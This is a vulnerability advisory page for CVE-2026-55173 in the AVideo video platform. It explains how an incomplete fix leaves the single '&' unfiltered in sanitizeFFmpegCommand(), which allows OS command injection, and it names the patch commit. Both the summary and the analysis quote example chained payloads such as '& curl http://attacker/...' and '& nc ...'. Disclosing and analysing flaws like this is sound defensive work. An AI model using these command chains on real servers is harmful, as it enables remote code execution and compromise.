CVE-2026-55173 in AVideoinfo

Summary

by MITRE • 07/16/2026

WWBN AVideo is an open source video platform. Versions 29.0 and below remain vulnerable to OS command injection because the fix for CVE-2026-33482 was incomplete and still does not neutralize a single & ( the shell background operator). CVE-2026-33482 reported that sanitizeFFmpegCommand() (plugin/API/standAlone/functions.php) failed to strip $(...) command substitution, allowing OS command injection at the execAsync() sh -c sink. The fix (commit 25c8ab90) added $, (, ), {, }, \n, \r to the denylist character class and a str_replace('&&', '', ...), but did not account for the single &. ffmpeg.json.php builds the command from _decryptString(getInput('codeToExecEncrypted')). This is the same threat model the original advisory accepted (“an attacker who can craft a valid encrypted payload can achieve arbitrary command execution on the standalone encoder server”) and the same CVSS basis (AV:N/AC:H/PR:N). Multiple &-separated commands can be chained (e.g. download + execute). Redirect-based payloads are blocked by the > strip, but command execution (e.g. & curl http://attacker/..., & nc ..., dropping/running a file) is not. This issue has been patched by this commit: https://github.com/WWBN/AVideo/commit/c1cfa2bea8a351a1d07f5758f82887403e3abf1f.

VulDB is the best source for vulnerability data and more expert information about this specific topic.

Analysis

by VulDB Data Team • 07/16/2026

The vulnerability in AVideo versions 29.0 and below represents a critical operating system command injection flaw that stems from an incomplete security fix for CVE-2026-33482. This issue affects the plugin/API/standAlone/functions.php file where the sanitizeFFmpegCommand() function fails to properly neutralize command substitution patterns, specifically leaving the single ampersand character (&) unaddressed in its denylist. The original vulnerability occurred because the function was designed to strip potentially dangerous characters from user input destined for shell execution through execAsync() at the sh -c sink. The attempted remediation in commit 25c8ab90 introduced a character class that blocks $, (, ), {, }, \n, \r but failed to account for the shell background operator &, which allows multiple commands to be executed sequentially within the same process context.

The exploitation mechanism relies on ffmpeg.json.php constructing command strings from _decryptString(getInput('codeToExecEncrypted')) where attackers can craft encrypted payloads that bypass the incomplete sanitization. This creates a scenario where an attacker with access to valid encrypted payload creation capabilities can achieve arbitrary command execution on the standalone encoder server, maintaining the same threat model and CVSS scoring as the original vulnerability assessment. The issue becomes particularly dangerous because multiple commands can be chained using the & operator, enabling complex attack patterns such as downloading malicious payloads followed by execution or establishing reverse shells. While redirect-based payloads are blocked through the removal of > characters, command execution mechanisms like & curl http://attacker/... or & nc ... remain functional, allowing attackers to drop files or run arbitrary code on the target system.

This vulnerability directly maps to CWE-78 operating system command injection and aligns with ATT&CK technique T1059.004 for command and script interpreter. The incomplete fix demonstrates a common security pattern where defenders address some attack vectors while overlooking others, particularly when dealing with shell metacharacters that have multiple meanings in command execution contexts. The root cause lies in the insufficient character validation approach that fails to consider all shell operators capable of chaining commands, including the single & background operator that allows processes to run concurrently without blocking the shell. Security researchers should note that this type of vulnerability often requires comprehensive testing of all shell metacharacters rather than targeted fixes for specific patterns.

The remediation implemented in commit c1cfa2bea8a351a1d07f5758f82887403e3abf1f addresses this by properly neutralizing the single & character in the command sanitization process, ensuring that all shell operators capable of command chaining are appropriately filtered. This complete fix resolves the vulnerability by extending the denylist to include the background operator and implementing proper input validation that prevents multiple commands from being executed sequentially within the same shell context. The corrected implementation ensures that even if an attacker manages to craft malicious encrypted payloads, they cannot leverage the shell's command chaining capabilities to execute arbitrary operations on the vulnerable system.

The broader implications of this vulnerability highlight the importance of thorough security testing and validation of fixes, particularly in systems handling user-supplied input destined for shell execution contexts. This case study demonstrates how seemingly minor oversights in character filtering can create significant security risks, as the single unaddressed character allows for complex attack scenarios that bypass multiple layers of intended protection. Organizations maintaining similar systems should implement comprehensive input validation frameworks that account for all shell metacharacters and consider using safer alternatives to direct shell command execution where possible. The vulnerability also underscores the need for automated testing of security patches to ensure complete remediation before deployment, as manual verification often misses edge cases like single character operators that can be exploited in combination with other attack vectors.

Responsible

GitHub M

Reservation

06/16/2026

Disclosure

07/16/2026

Moderation

accepted

CPE

ready

EPSS

0.00000

KEV

no

Activities

low

Sources

Want to know what is going to be exploited?

We predict KEV entries!